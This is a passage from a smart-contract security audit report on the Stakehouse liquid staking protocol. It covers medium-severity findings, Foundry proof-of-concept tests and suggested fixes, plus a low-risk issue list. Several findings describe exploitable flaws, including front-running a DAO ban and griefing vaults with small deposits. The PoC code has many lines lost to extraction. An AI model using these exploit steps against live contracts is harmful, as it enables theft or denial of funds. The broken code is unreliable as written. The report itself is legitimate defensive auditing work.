    function _deRegisterKnots(bytes[] calldata _blsPublicKeys) internal {
        for (uint256 i; i < _blsPublicKeys.length; ++i) {
            bytes memory blsPublicKey = _blsPublicKeys[i];

            // Do one final snapshot of ETH owed to the collateralized SLOT owners so they can claim later

            // Execute the business logic for de-registering the single knot

    function _deRegisterKnot(bytes memory _blsPublicKey) internal {
        if (isKnotRegistered[_blsPublicKey] == false) revert KnotIsNotRegisteredWithSyndicate();
        if (isNoLongerPartOfSyndicate[_blsPublicKey] == true) revert KnotHasAlreadyBeenDeRegistered();

        // We flag that the knot is no longer part of the syndicate
        isNoLongerPartOfSyndicate[_blsPublicKey] = true;

        // For the free floating and collateralized SLOT of the knot, snapshot the accumulated ETH per share
        lastAccumulatedETHPerFreeFloatingShare[_blsPublicKey] = accumulatedETHPerFreeFloatingShare;

        // We need to reduce `totalFreeFloatingShares` in order to avoid further ETH accruing to shares of de-registered knot
        totalFreeFloatingShares -= sETHTotalStakeForKnot[_blsPublicKey];

        // Total number of registered knots with the syndicate reduces by one
        numberOfRegisteredKnots -= 1;

        emit KnotDeRegistered(_blsPublicKey);

    function updateAccruedETHPerShares() public {
        if (numberOfRegisteredKnots > 0) {
        } else {
            // todo - check else case for any ETH lost

Proof of Concept

Please add the following code in test\foundry\LiquidStakingManager.t.sol.

  1. Import stdError as follows.
import { stdError } from "forge-std/Test.sol";
  1. Add the following test. This test will pass to demonstrate the described scenario.
    function testEIP1559RewardsReceivedBySyndicateDuringPeriodWhenItHasNoRegisteredKnotsCanBeLost() public {
        // set up users and ETH
        address nodeRunner = accountOne;, 4 ether);
        address feesAndMevUser = accountTwo;, 4 ether);
        address savETHUser = accountThree;, 24 ether);

        // do everything from funding a validator within default LSDN to minting derivatives

        // send the syndicate some EIP1559 rewards
        uint256 eip1559Tips = 0.6743 ether;
        (bool success, ) = manager.syndicate().call{value: eip1559Tips}("");
        assertEq(success, true);

        // de-register the only knot from the syndicate to send sETH back to the smart wallet
        IERC20 sETH = IERC20(MockSlotRegistry(factory.slot()).stakeHouseShareTokens(manager.stakehouse()));
        uint256 sETHBalanceBefore = sETH.balanceOf(manager.smartWalletOfNodeRunner(nodeRunner));
            getUint256ArrayFromValues(12 ether)

            sETH.balanceOf(manager.smartWalletOfNodeRunner(nodeRunner)) - sETHBalanceBefore,
            12 ether

        vm.warp(block.timestamp + 3 hours);

        // feesAndMevUser, who is the Staking Funds vault's LP holder, can claim rewards accrued up to the point of pulling the plug
        stakingFundsVault.claimRewards(feesAndMevUser, getBytesArrayFromBytes(blsPubKeyFour));

        uint256 feesAndMevUserEthBalanceBefore = feesAndMevUser.balance;
        assertEq(feesAndMevUserEthBalanceBefore, (eip1559Tips / 2) - 1);

        // nodeRunner, who is the collateralized SLOT holder for blsPubKeyFour, can claim rewards accrued up to the point of pulling the plug
        manager.claimRewardsAsNodeRunner(nodeRunner, getBytesArrayFromBytes(blsPubKeyFour));
        assertEq(nodeRunner.balance, (eip1559Tips / 2));

        // more EIP1559 rewards are sent to the syndicate, which has no registered knot at this moment        
        (success, ) = manager.syndicate().call{value: eip1559Tips}("");
        assertEq(success, true);

        vm.warp(block.timestamp + 3 hours);

        // calling the claimRewards function by feesAndMevUser has no effect at this moment
        stakingFundsVault.claimRewards(feesAndMevUser, getBytesArrayFromBytes(blsPubKeyFour));
        assertEq(feesAndMevUser.balance, feesAndMevUserEthBalanceBefore);

        // calling the claimRewardsAsNodeRunner function by nodeRunner reverts at this moment
        vm.expectRevert("Nothing received");
        manager.claimRewardsAsNodeRunner(nodeRunner, getBytesArrayFromBytes(blsPubKeyFour));

        // however, the syndicate still holds the EIP1559 rewards received by it during the period when the only knot was de-registered
        assertEq(manager.syndicate().balance, eip1559Tips + 1);

        vm.warp(block.timestamp + 3 hours);, 4 ether);, 4 ether);, 24 ether);

        // For a different BLS public key, which is blsPubKeyTwo, 
        //   do everything from funding a validator within default LSDN to minting derivatives.

        // calling the claimRewards function by feesAndMevUser reverts at this moment
        stakingFundsVault.claimRewards(feesAndMevUser, getBytesArrayFromBytes(blsPubKeyTwo));

        // Yet, calling the claimRewardsAsNodeRunner function by nodeRunner receives half of the EIP1559 rewards
        //   received by the syndicate during the period when it has no registered knots.
        // Because such rewards are not received by the syndicate after the derivatives are minted for blsPubKeyTwo,
        //   nodeRunner does not deserve these for blsPubKeyTwo. 
        manager.claimRewardsAsNodeRunner(nodeRunner, getBytesArrayFromBytes(blsPubKeyTwo));
        assertEq(nodeRunner.balance, eip1559Tips / 2);

        // Still, half of the EIP1559 rewards that were received by the syndicate
        //   during the period when the syndicate has no registered knots is locked in the syndicate.
        assertEq(manager.syndicate().balance, eip1559Tips / 2 + 1);

Tools Used


The else block of the updateAccruedETHPerShares function ( can be updated to include logics that handle the EIP1559 rewards received by the syndicate during the period when it has no registered knots.

vince0656 (Stakehouse) disputed and commented:

Node runners should index the chain when the knot is removed from the LSD network and update their fee recipient.

LSDan (judge) decreased severity to Medium and commented:

I’m going to leave this in place but as a Medium.

[M-22] ETH sent when calling executeAsSmartWallet function can be lost

Submitted by rbserver, also found by 0xbepresent

Calling the executeAsSmartWallet function by the DAO further calls the OwnableSmartWallet.execute function. Since the executeAsSmartWallet function is payable, an ETH amount can be sent when calling it. However, since the sent ETH amount is not forwarded to the smart wallet contract, such sent amount can become locked in the LiquidStakingManager contract. For example, when the DAO attempts to call the executeAsSmartWallet function for sending some ETH to the smart wallet so the smart wallet can use it when calling its execute function, if the smart wallet’s ETH balance is also higher than this sent ETH amount, calling the executeAsSmartWallet function would not revert, and the sent ETH amount is locked in the LiquidStakingManager contract while such amount is deducted from the smart wallet’s ETH balance for being sent to the target address. Besides that this is against the intention of the DAO, the DAO loses the sent ETH amount that becomes locked in the LiquidStakingManager contract, and the node runner loses the amount that is unexpectedly deducted from the corresponding smart wallet’s ETH balance.

    function executeAsSmartWallet(
        address _nodeRunner,
        address _to,
        bytes calldata _data,
        uint256 _value
    ) external payable onlyDAO {
        address smartWallet = smartWalletOfNodeRunner[_nodeRunner];
        require(smartWallet != address(0), "No wallet found");

    function execute(
        address target,
        bytes memory callData,
        uint256 value
        onlyOwner // F: [OSW-6A]
        returns (bytes memory)
        return target.functionCallWithValue(callData, value); // F: [OSW-6]

Proof of Concept

Please add the following code in test\foundry\LSDNFactory.t.sol.

  1. Add the following receive function for the POC purpose.
    receive() external payable {}
  1. Add the following test. This test will pass to demonstrate the described scenario.
    function testETHSentWhenCallingExecuteAsSmartWalletFunctionCanBeLost() public {

        uint256 nodeStakeAmount = 4 ether;
        address nodeRunner = accountOne;, nodeStakeAmount);

        address eoaRepresentative = accountTwo;

        manager.registerBLSPublicKeys{value: nodeStakeAmount}(

        // Before the executeAsSmartWallet function is called, the manager contract owns 0 ETH,
        //   and nodeRunner's smart wallet owns 4 ETH. 
        assertEq(address(manager).balance, 0);
        assertEq(manager.smartWalletOfNodeRunner(nodeRunner).balance, 4 ether);

        uint256 amount = 1.5 ether;, amount);


        // admin, who is dao at this moment, calls the executeAsSmartWallet function while sending 1.5 ETH
        manager.executeAsSmartWallet{value: amount}(nodeRunner, address(this), bytes(""), amount);


        // Although admin attempts to send the 1.5 ETH through calling the executeAsSmartWallet function,
        //   the sent 1.5 ETH was not transferred to nodeRunner's smart wallet but is locked in the manager contract instead.
        assertEq(address(manager).balance, amount);

        // Because nodeRunner's smart wallet owns more than 1.5 ETH, 1.5 ETH of this smart wallet's ETH balance is actually sent to address(this).
        assertEq(manager.smartWalletOfNodeRunner(nodeRunner).balance, 4 ether - amount);

Tools Used

VSCode can be updated to the following code.

        IOwnableSmartWallet(smartWallet).execute{value: msg.value}(

vince0656 (Stakehouse) confirmed

LSDan (judge) decreased severity to Medium and commented:

The external factor implied is that the DAO loses control of itself to bad actors. As such, this really can’t be a high risk.

[M-23] Calling updateNodeRunnerWhitelistStatus function always reverts

Submitted by rbserver, also found by 0xPanda, ReyAdmirado, Trust, Josiah, Franfran, pashov, Aymen0909, btk, zgo, Jeiwan, SmartSek, Awesome, shark, RaymondFam, trustindistrust, HE1M, and aphak5010

Calling the updateNodeRunnerWhitelistStatus function by the DAO supposes to allow the trusted node runners to use and interact with the protocol when enableWhitelisting is set to true. However, since calling the updateNodeRunnerWhitelistStatus function executes require(isNodeRunnerWhitelisted[_nodeRunner] != isNodeRunnerWhitelisted[_nodeRunner], "Unnecessary update to same status"), which always reverts, the DAO is unable to whitelist any trusted node runners. Because none of them can be whitelisted, all trusted node runners cannot call functions like registerBLSPublicKeys when the whitelisting mode is enabled. As the major functionalities become unavailable, the protocol’s usability becomes much limited, and the user experience becomes much degraded.

    function updateNodeRunnerWhitelistStatus(address _nodeRunner, bool isWhitelisted) external onlyDAO {
        require(_nodeRunner != address(0), "Zero address");
        require(isNodeRunnerWhitelisted[_nodeRunner] != isNodeRunnerWhitelisted[_nodeRunner], "Unnecessary update to same status");

        isNodeRunnerWhitelisted[_nodeRunner] = isWhitelisted;
        emit NodeRunnerWhitelistingStatusChanged(_nodeRunner, isWhitelisted);

    function _isNodeRunnerValid(address _nodeRunner) internal view returns (bool) {
        require(_nodeRunner != address(0), "Zero address");

        if(enableWhitelisting) {
            require(isNodeRunnerWhitelisted[_nodeRunner] == true, "Invalid node runner");

        return true;

    function registerBLSPublicKeys(
        bytes[] calldata _blsPublicKeys,
        bytes[] calldata _blsSignatures,
        address _eoaRepresentative
    ) external payable nonReentrant {
        require(_isNodeRunnerValid(msg.sender) == true, "Unrecognised node runner");

Proof of Concept

Please add the following test in test\foundry\LSDNFactory.t.sol. This test will pass to demonstrate the described scenario.

    function testCallingUpdateNodeRunnerWhitelistStatusFunctionAlwaysReverts() public {


        vm.expectRevert("Unnecessary update to same status");
        manager.updateNodeRunnerWhitelistStatus(accountOne, true);

        vm.expectRevert("Unnecessary update to same status");
        manager.updateNodeRunnerWhitelistStatus(accountTwo, false);


Tools Used

VSCode can be updated to the following code.

        require(isNodeRunnerWhitelisted[_nodeRunner] != isWhitelisted, "Unnecessary update to same status");

vince0656 (Stakehouse) confirmed

[M-24] Node runner who is already known to be malicious cannot be banned before corresponding smart wallet is created

Submitted by rbserver

Currently, the rotateNodeRunnerOfSmartWallet function provides the only way to set bannedNodeRunners to true for a malicious node runner. However, before the node runner calls the registerBLSPublicKeys function to create a smart wallet, calling the rotateNodeRunnerOfSmartWallet function reverts. This means that for a node runner, who is already known to be malicious such as someone controlling a hacker address, calling the isNodeRunnerBanned function always return false before the registerBLSPublicKeys function is called for the first time, and executing require(isNodeRunnerBanned(msg.sender) == false, "Node runner is banned from LSD network") when calling the registerBLSPublicKeys function for the first time is not effective. As the monitoring burden can be high, the malicious node runner could interact with the protocol maliciously for a while already after the registerBLSPublicKeys function is called until the DAO notices the malicious activities and then calls the rotateNodeRunnerOfSmartWallet function. When the DAO does not react promptly, some damages to the protocol could be done already.

    function rotateNodeRunnerOfSmartWallet(address _current, address _new, bool _wasPreviousNodeRunnerMalicious) external {

        if (msg.sender == dao && _wasPreviousNodeRunnerMalicious) {
            bannedNodeRunners[_current] = true;
            emit NodeRunnerBanned(_current);


    function isNodeRunnerBanned(address _nodeRunner) public view returns (bool) {
        return bannedNodeRunners[_nodeRunner];

    function registerBLSPublicKeys(
        bytes[] calldata _blsPublicKeys,
        bytes[] calldata _blsSignatures,
        address _eoaRepresentative
    ) external payable nonReentrant {
        require(isNodeRunnerBanned(msg.sender) == false, "Node runner is banned from LSD network");

        address smartWallet = smartWalletOfNodeRunner[msg.sender];

        if(smartWallet == address(0)) {
            // create new wallet owned by liquid staking manager
            smartWallet = smartWalletFactory.createWallet(address(this));
            emit SmartWalletCreated(smartWallet, msg.sender);

            // associate node runner with the newly created wallet
            smartWalletOfNodeRunner[msg.sender] = smartWallet;
            nodeRunnerOfSmartWallet[smartWallet] = msg.sender;

            _authorizeRepresentative(smartWallet, _eoaRepresentative, true);


Proof of Concept

Please add the following test in test\foundry\LSDNFactory.t.sol. This test will pass to demonstrate the described scenario.

    function testMaliciousNodeRunnerCannotBeBannedBeforeCorrespondingSmartWalletIsCreated() public {

        // Simulate a situation where accountOne is known to be malicious already.
        // accountOne is not banned at this moment.
        assertEq(manager.bannedNodeRunners(accountOne), false);

        // Calling the rotateNodeRunnerOfSmartWallet function is the only way to ban accountOne;
        //   however, calling it reverts because accountOne has not called the registerBLSPublicKeys function to create a smart wallet yet.
        // This means that it is not possible to prevent accountOne from interacting with the protocol until her or his smart wallet is created.
        vm.expectRevert("Wallet does not exist");
        manager.rotateNodeRunnerOfSmartWallet(accountOne, accountTwo, true);

Tools Used


A function, which should be only callable by the DAO, that can directly set bannedNodeRunners for a node runner can be added.

vince0656 (Stakehouse) confirmed

[M-25] Incorrect checking in _assertUserHasEnoughGiantLPToClaimVaultLP

Submitted by hihen, also found by Trust and Lambda

The batch operations of withdrawDETH() in GiantSavETHVaultPool.sol and withdrawLPTokens() in GiantPoolBase.sol are meaningless because they will fail whenever more than one lpToken is passed.
Each user can perform withdrawDETH() or withdrawLPTokens() with one LPToken only once a day.

Proof of Concept

Both the withdrawDETH() in GiantSavETHVaultPool.sol and withdrawLPTokens() in GiantPoolBase.sol will call GiantPoolBase._assertUserHasEnoughGiantLPToClaimVaultLP(lpToken, amount) and lpTokenETH.burn(msg.sender, amount):

There is a require in _assertUserHasEnoughGiantLPToClaimVaultLP():

require(lpTokenETH.lastInteractedTimestamp(msg.sender) + 1 days < block.timestamp, "Too new");

At the same time, lpTokenETH.burn(msg.sender, amount) will update lastInteractedTimestamp[msg.sender] to latest block timestamp in _afterTokenTransfer() of GiantLP.sol.

So, a user can perform withdrawDETH or withdrawLPTokens of one LPToken only once a day, others more will fail by _assertUserHasEnoughGiantLPToClaimVaultLP().

Tools Used

VS Code

The LPToken being operated on should be checked for lastInteractedTimestamp rather than lpTokenETH.

diff --git a/contracts/liquid-staking/GiantPoolBase.sol b/contracts/liquid-staking/GiantPoolBase.sol
index 8a8ff70..5c009d9 100644
--- a/contracts/liquid-staking/GiantPoolBase.sol
+++ b/contracts/liquid-staking/GiantPoolBase.sol
@@ -93,7 +93,7 @@ contract GiantPoolBase is ReentrancyGuard {
     function _assertUserHasEnoughGiantLPToClaimVaultLP(LPToken _token, uint256 _amount) internal view {
         require(_amount >= MIN_STAKING_AMOUNT, "Invalid amount");
         require(_token.balanceOf(address(this)) >= _amount, "Pool does not own specified LP");
-        require(lpTokenETH.lastInteractedTimestamp(msg.sender) + 1 days < block.timestamp, "Too new");
+        require(_token.lastInteractedTimestamp(msg.sender) + 1 days < block.timestamp, "Too new");

     /// @dev Allow an inheriting contract to have a hook for performing operations post depositing ETH

vince0656 (Stakehouse) confirmed

[M-26] Compromised or malicious DAO can restrict actions of node runners who are not malicious

Submitted by rbserver, also found by chaduke


When calling the deployNewLiquidStakingDerivativeNetwork function, _dao is not required to be an address that corresponds to a governance contract. This is also confirmed by the code walkthrough at, which mentions that _dao can correspond to an address of a single user. Especially when the DAO is set to be an EOA address, it is possible that its private key becomes compromised. Moreover, because the updateDAOAddress function lacks a two step procedure for transferring the DAO’s role, it is possible that the DAO is set to an uncontrolled address, which can be malicious. When the DAO becomes compromised or malicious, the actions of the node runners, who are not malicious, can be restricted at the DAO’s will, such as by calling functions like rotateEOARepresentativeOfNodeRunner and rotateNodeRunnerOfSmartWallet. For example, a compromised DAO can call the rotateNodeRunnerOfSmartWallet function to transfer a smart wallet from a node runner, who is not malicious at all, to a colluded party. Afterwards, the affected node runner is banned from many interactions with the protocol and can no longer call, for instance, the withdrawETHForKnot function for withdrawing ETH from the corresponding smart wallet. Hence, a compromised or malicious DAO can cause severe consequences, including ETH losses.

    function deployNewLiquidStakingDerivativeNetwork(
        address _dao,
        uint256 _optionalCommission,
        bool _deployOptionalHouseGatekeeper,
        string calldata _stakehouseTicker
    ) public returns (address) {

        // Clone a new liquid staking manager instance
        address newInstance = Clones.clone(liquidStakingManagerImplementation);


    function updateDAOAddress(address _newAddress) external onlyDAO {
        require(_newAddress != address(0), "Zero address");
        require(_newAddress != dao, "Same address");

        emit UpdateDAOAddress(dao, _newAddress);

        dao = _newAddress;

    function rotateEOARepresentativeOfNodeRunner(address _nodeRunner, address _newRepresentative) external onlyDAO {
        require(_newRepresentative != address(0), "Zero address");

        address smartWallet = smartWalletOfNodeRunner[_nodeRunner];
        require(smartWallet != address(0), "No smart wallet");
        require(stakedKnotsOfSmartWallet[smartWallet] == 0, "Not all KNOTs are minted");
        require(smartWalletRepresentative[smartWallet] != _newRepresentative, "Invalid rotation to same EOA");

        // unauthorize old representative
        _authorizeRepresentative(smartWallet, smartWalletRepresentative[smartWallet], false);

        // authorize new representative
        _authorizeRepresentative(smartWallet, _newRepresentative, true);

    function rotateNodeRunnerOfSmartWallet(address _current, address _new, bool _wasPreviousNodeRunnerMalicious) external {
        require(_new != address(0) && _current != _new, "New is zero or current");

        address wallet = smartWalletOfNodeRunner[_current];
        require(wallet != address(0), "Wallet does not exist");
        require(_current == msg.sender || dao == msg.sender, "Not current owner or DAO");

        address newRunnerCurrentWallet = smartWalletOfNodeRunner[_new];
        require(newRunnerCurrentWallet == address(0), "New runner has a wallet");

        smartWalletOfNodeRunner[_new] = wallet;
        nodeRunnerOfSmartWallet[wallet] = _new;

        delete smartWalletOfNodeRunner[_current];

        if (msg.sender == dao && _wasPreviousNodeRunnerMalicious) {
            bannedNodeRunners[_current] = true;
            emit NodeRunnerBanned(_current);

        emit NodeRunnerOfSmartWalletRotated(wallet, _current, _new);

    function withdrawETHForKnot(address _recipient, bytes calldata _blsPublicKeyOfKnot) external {

        address associatedSmartWallet = smartWalletOfKnot[_blsPublicKeyOfKnot];
        require(smartWalletOfNodeRunner[msg.sender] == associatedSmartWallet, "Not the node runner for the smart wallet ");
        require(isNodeRunnerBanned(nodeRunnerOfSmartWallet[associatedSmartWallet]) == false, "Node runner is banned from LSD network");

Proof of Concept

Please add the following test in test\foundry\LSDNFactory.t.sol. This test will pass to demonstrate the described scenario.

    function testCompromisedDaoCanRestrictActionsOfNodeRunnersWhoAreNotMalicious() public {

        uint256 nodeStakeAmount = 4 ether;
        address nodeRunner = accountOne;, nodeStakeAmount);

        address eoaRepresentative = accountTwo;

        manager.registerBLSPublicKeys{value: nodeStakeAmount}(

        // Simulate a situation where admin, who is the dao at this moment, is compromised.
        // Although nodeRunner is not malicious,
        //   the compromised admin can call the rotateNodeRunnerOfSmartWallet function to assign nodeRunner's smart wallet to a colluded party.
        manager.rotateNodeRunnerOfSmartWallet(nodeRunner, accountThree, true);

        // nodeRunner is blocked from other interactions with the protocol since it is now banned unfairly
        assertEq(manager.bannedNodeRunners(accountOne), true);

        // for example, nodeRunner is no longer able to call the withdrawETHForKnot function
        vm.expectRevert("Not the node runner for the smart wallet ");
        manager.withdrawETHForKnot(nodeRunner, blsPubKeyOne);

Tools Used


When calling the deployNewLiquidStakingDerivativeNetwork function, instead of explicitly setting the DAO’s address, a configurable governance contract, which can have features like voting and timelock, can be deployed and used as the DAO.

vince0656 (Stakehouse) disputed

[M-27] rotateNodeRunnerOfSmartWallet is vulnerable to a frontrun attack

Submitted by Franfran

As the rotateNodeRunnerOfSmartWallet function can be called by anyone who is a node runner in the LSD network, this function is vulnerable to a frontrun attack in the case of this node runner being malicious.

Proof of Concept

If that is the current node runner is malicious, the DAO would purposely call this same rotateNodeRunnerOfSmartWallet with the _wasPreviousNodeRunnerMalicious flag turned on.
An actual node runner that has been malicious could monitor the mempool and frontrun the DAO transaction that wanted to slash it and submit the transaction before the DAO to avoid getting banned and rotate their EOA representation of the node.

if (msg.sender == dao && _wasPreviousNodeRunnerMalicious) {
    bannedNodeRunners[_current] = true;
    emit NodeRunnerBanned(_current);

When the DAO transaction would go through, it would revert when it’s checking if the current (old) node representative is still a wallet, but it’s not because the mapping value has been deleted before.

address wallet = smartWalletOfNodeRunner[_current];
require(wallet != address(0), "Wallet does not exist");

Restrict this function to DAO only with the onlyDAO modifier.

// - function rotateNodeRunnerOfSmartWallet(address _current, address _new, bool _wasPreviousNodeRunnerMalicious) external {
+ function rotateNodeRunnerOfSmartWallet(address _current, address _new, bool _wasPreviousNodeRunnerMalicious) onlyDAO external {
    require(_new != address(0) && _current != _new, "New is zero or current");

    address wallet = smartWalletOfNodeRunner[_current];
    require(wallet != address(0), "Wallet does not exist");
    require(_current == msg.sender || dao == msg.sender, "Not current owner or DAO");

    address newRunnerCurrentWallet = smartWalletOfNodeRunner[_new];
    require(newRunnerCurrentWallet == address(0), "New runner has a wallet");

    smartWalletOfNodeRunner[_new] = wallet;
    nodeRunnerOfSmartWallet[wallet] = _new;

    delete smartWalletOfNodeRunner[_current];

    // - if (msg.sender == dao && _wasPreviousNodeRunnerMalicious) {
    if (_wasPreviousNodeRunnerMalicious) {
        bannedNodeRunners[_current] = true;
        emit NodeRunnerBanned(_current);

    emit NodeRunnerOfSmartWalletRotated(wallet, _current, _new);

vince0656 (Stakehouse) confirmed

[M-28] Funds are not claimed from syndicate for valid BLS keys of first key is invalid (no longer part of syndicate).

Submitted by Trust

claimRewards in StakingFundsVault.sol has this code:

if (i == 0 && !Syndicate(payable(liquidStakingNetworkManager.syndicate())).isNoLongerPartOfSyndicate(_blsPubKeys[i])) {
    // Withdraw any ETH accrued on free floating SLOT from syndicate to this contract
    // If a partial list of BLS keys that have free floating staked are supplied, then partial funds accrued will be fetched
    // Distribute ETH per LP

The issue is that if the first BLS public key is not part of the syndicate, then _claimFundsFromSyndicateForDistribution will not be called, even on BLS keys that are eligible for syndicate rewards. This leads to reduced rewards for user.

This is different from a second bug which discusses the possibility of using a stale acculmulatedETHPerLP.


Users will not receive rewards for claims of valid public keys if first passed key is not part of syndicate.

Drop the i==0 requirement, which was intended to make sure the claim isn’t called multiple times. Use a hasClaimed boolean instead.

vince0656 (Stakehouse) confirmed

[M-29] User receives less rewards than they are eligible for if first passed BLS key is inactive

Submitted by Trust

StakingFundsVault has the claimRewards() function to allow users to withdraw profits.

function claimRewards(
    address _recipient,
    bytes[] calldata _blsPubKeys
) external nonReentrant {
    for (uint256 i; i < _blsPubKeys.length; ++i) {
            liquidStakingNetworkManager.isBLSPublicKeyBanned(_blsPubKeys[i]) == false,
            "Unknown BLS public key"
        // Ensure that the BLS key has its derivatives minted
            getAccountManager().blsPublicKeyToLifecycleStatus(_blsPubKeys[i]) == IDataStructures.LifecycleStatus.TOKENS_MINTED,
            "Derivatives not minted"
        if (i == 0 && !Syndicate(payable(liquidStakingNetworkManager.syndicate())).isNoLongerPartOfSyndicate(_blsPubKeys[i])) {
            // Withdraw any ETH accrued on free floating SLOT from syndicate to this contract
            // If a partial list of BLS keys that have free floating staked are supplied, then partial funds accrued will be fetched
            // Distribute ETH per LP
        // If msg.sender has a balance for the LP token associated with the BLS key, then send them any accrued ETH
        LPToken token = lpTokenForKnot[_blsPubKeys[i]];
        require(address(token) != address(0), "Invalid BLS key");
        require(token.lastInteractedTimestamp(msg.sender) + 30 minutes < block.timestamp, "Last transfer too recent");
        _distributeETHRewardsToUserForToken(msg.sender, address(token), token.balanceOf(msg.sender), _recipient);

The issue is that updateAccumulatedETHPerLP() is not guaranteed to be called, which means the ETH reward distribution in _distribute would use stale value, and users will not receive as many rewards as they should.
updateAccumulatedETHPerLP is only called if the first BLS public key is part of the syndicate. However, for the other keys it makes no reason not to use the up to date accumulatedETHPerLPShare value.


User receives less rewards than they are eligible for if first passed BLS key is inactive.

Call updateAccumulatedETHPerLP() at the start of the function.

vince0656 (Stakehouse) confirmed and commented:

This is a dupe of issue 408 (M-28)

LSDan (judge) commented:

I’ve asked the warden to come in and highlight the differences between this and M-28.

Trust (warden) commented:

Hi. Both rewards show different ways in which users don’t receive their eligible rewards.

This report talks about use of an old accumulatedETHPerLPShare in the call to _distributeETHRewardsToUserForToken(). It will happen in any case where we don’t go into the if block. Using an old value means users won’t receive as much rewards as have been unlocked.
The second report (M-28) is about _claimFundsFromSyndicateForDistribution not being called although it should be. suppose the blsPubKeys array has first element which is no longer part of syndicate, but the rest of the array are part of syndicate. Then we skip claiming funds from them. Therefore, there will be less funds to give away as rewards.

One report is about incorrect share value leak, the second is about total rewards leak.

[M-30] Giant pools are prone to user griefing, preventing their holdings from being staked

Submitted by Trust

batchRotateLPTokens in GiantMevAndFeesPool allows any user to rotate LP tokens of stakingFundsVaults around.

function batchRotateLPTokens(
    address[] calldata _stakingFundsVaults,
    LPToken[][] calldata _oldLPTokens,
    LPToken[][] calldata _newLPTokens,
    uint256[][] calldata _amounts
) external {
    uint256 numOfRotations = _stakingFundsVaults.length;
    require(numOfRotations > 0, "Empty arrays");
    require(numOfRotations == _oldLPTokens.length, "Inconsistent arrays");
    require(numOfRotations == _newLPTokens.length, "Inconsistent arrays");
    require(numOfRotations == _amounts.length, "Inconsistent arrays");
    require(lpTokenETH.balanceOf(msg.sender) >= 0.5 ether, "No common interest");
    for (uint256 i; i < numOfRotations; ++i) {
        StakingFundsVault(payable(_stakingFundsVaults[i])).batchRotateLPTokens(_oldLPTokens[i], _newLPTokens[i], _amounts[i]);

There is a check that sender has over 0.5 ether of lpTokenETH, to prevent griefing. However, this check is unsatisfactory as user can at any stage deposit ETH to receive lpTokenETH and burn it to receive back ETH. Their lpTokenETH holdings do not correlate with their interest in the vault funds.

Therefore, malicious users can keep bouncing LP tokens around and prevent them from being available for actual staking by liquid staking manager.


Giant pools are prone to user griefing, preventing their holdings from being staked.

Three options:

  1. batchRotateLPTokens should have logic to enforce that this specific rotation is logical
  2. Only DAO or some priviledged user can perform Giant pool operations
  3. Make the caller have something to lose from behaving maliciously, unlike the current status.

vince0656 (Stakehouse) disputed and commented:

This doesn’t factor in that when ETH is supplied to a liquid staking network, it has 30 minutes to be utilized for staking with the BLS public key - giant pool users can manage this inventory and move the liquidity between BLS keys but that’s by design and as mentioned above cannot move for 30 minutes at a time. If it never gets used, it can always go back to the giant pool

[M-31] Vaults can be griefed to not be able to be used for deposits

Submitted by Trust, also found by datapunk and Lambda

Interaction with SavETHVault and StakingFundsVault require a minimum amount of MIN_STAKING_AMOUNT. In order to be used for staking, there needs to be 24 ETH or 4 ETH for the desired BLS public key in those vaults. The issue is that vaults can be griefed and made impossible to use for depositing by constantly making sure the remaining amount to be added to complete the deposit to the maxStakingAmountPerValidator, is under MIN_STAKING_AMOUNT.

In _depositETHForStaking:

function _depositETHForStaking(bytes calldata _blsPublicKeyOfKnot, uint256 _amount, bool _enableTransferHook) internal {
    require(_amount >= MIN_STAKING_AMOUNT, "Min amount not reached");
    require(_blsPublicKeyOfKnot.length == 48, "Invalid BLS public key");
    // LP token issued for the KNOT
    // will be zero for a new KNOT because the mapping doesn't exist
    LPToken lpToken = lpTokenForKnot[_blsPublicKeyOfKnot];
    if(address(lpToken) != address(0)) {
        // KNOT and it's LP token is already registered
        // mint the respective LP tokens for the user
        // total supply after minting the LP token must not exceed maximum staking amount per validator
        require(lpToken.totalSupply() + _amount <= maxStakingAmountPerValidator, "Amount exceeds the staking limit for the validator");
        // mint LP tokens for the depoistor with 1:1 ratio of LP tokens and ETH supplied, _amount);
        emit LPTokenMinted(_blsPublicKeyOfKnot, address(lpToken), msg.sender, _amount);
    else {
        // check that amount doesn't exceed max staking amount per validator
        require(_amount <= maxStakingAmountPerValidator, "Amount exceeds the staking limit for the validator");

MED - Can grief vaults (SavETHVault, StakingFundsVault) and make them not able to be used for staking by depositing so that left to stake is < MIN_STAKING_AMOUNT. Then it will fail maxStakingAmount check @ _depositEthForStaking


Vaults can be griefed to not be able to be used for deposits.

Proof of Concept

  1. savETHVault has 22 ETH for some validator
  2. Attacker deposits 1.9991 ETH to the savETHVault
  3. vault now has 23.9991 ETH. The remaining to complete to 24 is 0.0009 ETH which is under 0.001 ether, min staking amount
  4. No one can complete the staking

Note that depositers may try to remove their ETH and redeposit it to complete the deposit to 24. However attack may still keep the delta just under MIN_STAKING_AMOUNT.

Handle the case where the remaining amount to be completed is smaller than MIN_STAKING_AMOUNT, and allow the deposit in that case.

vince0656 (Stakehouse) confirmed

Low Risk and Non-Critical Issues

For this contest, 60 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by 0xSmartContract received the top score from the judge.

The following wardens also submitted reports: rbserver, 0xNazgul, Trust, Deivitto, joestakey, a12jmx, lukris02, c3phas, datapunk, Aymen0909, tnevler, fs0c, pashov, Franfran, 0x4non, delfin454000, CloudX, IllIllI, immeas, Diana, Josiah, brgltd, zaskoh, bulej93, cryptostellar5, Udsen, gz627, pedr02b2, nogo, zgo, B2, 0xdeadbeef0x, sakman, 0xmuxyz, sahar, ch0bu, aphak5010, rotcivegaf, SmartSek, shark, Awesome, 9svR6w, trustindistrust, Rolezn, chrisdior4, gogo, 0xRoxas, Bnke0x0, martin, RaymondFam, Sathish9098, Secureverse, oyc_109, ReyAdmirado, clems4ever, peanuts, chaduke, hl_, and pavankv.


Low Risk Issues List

Number Issues Details Context
[L-01] Draft Openzeppelin Dependencies 1
[L-02] Stack too deep when compiling
[L-03] Remove unused code 2
[L-04] Insufficient coverage
[L-05] Critical Address Changes Should Use Two-step Procedure
[L-06] Owner can renounce Ownership 2
[L-07] Loss of precision due to rounding 1
[L-08] Using vulnerable dependency of OpenZeppelin 1
[L-09] Use safeTransferOwnership instead of transferOwnership function 2

Total 9 issues

Non-Critical Issues List

Number Issues Details Context
[N-01] 0 address check 7
[N-02] Add parameter to Event-Emit 1
[N-03] Omissions in Events 1
[N-04] Include return parameters in NatSpec comments All contracts
[N-05] Use a more recent version of Solidity All contracts
[N-06] Solidity compiler optimizations can be problematic
[N-07] NatSpec is missing 27
[N-08] Lines are too long 9
[N-09] Missing Event for critical parameters change 1
[N-10] Add to indexed parameter for countable Events 4
[N-11] NatSpec comments should be increased in contracts All contracts
